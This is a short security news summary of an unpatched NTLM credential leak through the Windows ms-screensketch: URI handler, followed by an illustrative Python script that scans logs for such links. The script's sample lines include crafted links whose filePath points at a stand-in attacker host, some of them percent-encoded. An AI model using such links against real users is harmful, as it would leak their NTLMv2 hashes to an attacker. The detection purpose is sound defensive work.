Unpatched NTLM Vulnerability in Windows URI Handlers Exposes Credentials
A newly identified flaw in Windows URI handlers can leak NTLMv2 hashes to attacker-controlled servers with a single link click. This vulnerability is related to CVE-2026-33829, which was patched in the Windows Snipping Tool on April 14, 2026, but no CVE has been assigned for this variant. The issue arises from the ms-screensketch: URI handler, which does not validate the filePath parameter, allowing NTLM authentication to be triggered and exposing sensitive credentials. Attackers can exploit this flaw without requiring malware, merely by tricking users into clicking a link. The vulnerability affects Windows systems running the Snipping Tool and similar URI handlers. As of now, Microsoft has not provided a fix or acknowledged the new variant. Security professionals are urged to remain vigilant as this could facilitate unauthorized access to networks.
Key Points:
• A new NTLM vulnerability allows credential leakage via Windows URI handlers.
• The flaw is similar to CVE-2026-33829 but lacks a CVE and fix.
• Exploitation requires only a user to click a specially crafted link.
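
A detection check for the pattern described above, added here as an example and not taken from the article or from Microsoft: it scans text such as mail-gateway or proxy logs for ms-screensketch: links and flags those whose filePath value points at another host. The query-string layout, the remote-path forms it looks for (UNC, file://host, other scheme://) and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: filePath is passed as a query-style parameter. The page names the
# scheme and the parameter but does not show the full URI layout.
URI_RE = re.compile(r"ms-screensketch:[^\s\"'<>]*", re.IGNORECASE)
PARAM_RE = re.compile(r"(?:^|[?&;])filePath=([^&;]*)", re.IGNORECASE)
# Assumed remote forms: UNC (\\host\share, //host/share), file://host/..., or
# any other scheme://. A local file:///C:/... has an empty host and is not matched.
REMOTE_RE = re.compile(
    r"^(?:[\\/]{2}[^\\/]+[\\/]|file://[^/]|(?!file:)[a-z][a-z0-9+.-]*://)",
    re.IGNORECASE,
)

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are still inspected."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.strip()

def scan(text):
    """Return (verdict, decoded filePath) for each ms-screensketch: URI in text."""
    findings = []
    for match in URI_RE.finditer(text):
        rest = match.group(0).split(":", 1)[1]
        param = PARAM_RE.search(rest)
        if param is None:
            findings.append(("no-filepath", ""))
            continue
        path = decode(param.group(1))
        verdict = "remote" if REMOTE_RE.match(path) else "local"
        findings.append((verdict, path))
    return findings

# Constructed sample log lines (hosts and layout are illustrative, not from the page).
SAMPLE = """\
mail-gw url="ms-screensketch:edit?filePath=%5C%5Cfiles.attacker.example%5Cshare%5Cshot.png"
mail-gw url="ms-screensketch:edit?source=app&filePath=C%3A%5CUsers%5Calice%5Cshot.png"
proxy   url="ms-screensketch:edit?FILEPATH=%255C%255Chost.example%255Cs%255Cx.png"
proxy   url="https://intranet.example/help"
"""

if __name__ == "__main__":
    for verdict, path in scan(SAMPLE):
        print(f"{verdict:12} {path}")
```

A "remote" verdict is a triage signal for the link itself; whether the endpoint actually attempted outbound NTLM authentication has to be confirmed from network or host telemetry.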